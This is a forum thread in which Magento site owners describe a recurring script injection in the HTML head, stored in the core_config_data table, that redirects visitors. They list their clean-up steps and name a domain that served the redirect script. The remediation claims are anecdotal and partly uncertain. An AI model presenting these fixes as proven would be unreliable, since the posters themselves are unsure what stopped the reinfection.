Website start redirecting to another url

I found the injected code in the core_config_data table, under design/head/includes. Removed it and now the site is back to normal.

UPDATE: As everyone else mentioned, it happened again this morning. This time I got rid of it more easily from the Admin Panel under System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. This is a huge vulnerability, I hope Magento is working on a patch.

UPDATE 2: The script came back again, so I changed the db password, cleared cache. About an hour later, the script is back. So I don't think it's being added thru the db. I just changed my admin password, let's see if it comes back again.

UPDATE 3: Since I changed the admin password yesterday on both of my affected sites, about 24 hours later both are still clean.


Same issue on another magento site. I discovered that a script is injected in the HEAD section of the page, requesting redirect_base/redirect.js from melissatgmt.us (then changed to another domain) but can't figure out how this shit is injected.

UPDATE: As mentioned by others, found the entry in core_config_data table and removed it but the record was back at next page reload. I changed the db password and now it seems to be defeated. I'm not sure the password change is the ultimate solution but anyway is a security improvement.

UPDATE 2: As stated by Jix Sas, accessing from config in magento administration is an easier solution than directly accessing the database table. But the shit keeps coming back every 10/15 minutes.

UPDATE 3: Changed admin password, checked & saved some cms pages (customer-service and about-us) that seemed to be somehow infected, disabled cache, cleaned cache several times (after every check & save of 'infected' cms page) no more script injected during the past 8 hours.


I changed the path to admin panel in app/etc/local.xml and it helps. The script is no longer added to design/head/includes.

Explanation :

In the app/etc/local.xml I changed <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin> Previously it was sitedomain.com/admin, and now path to admin panel will be sitedomain.com/new_admin_path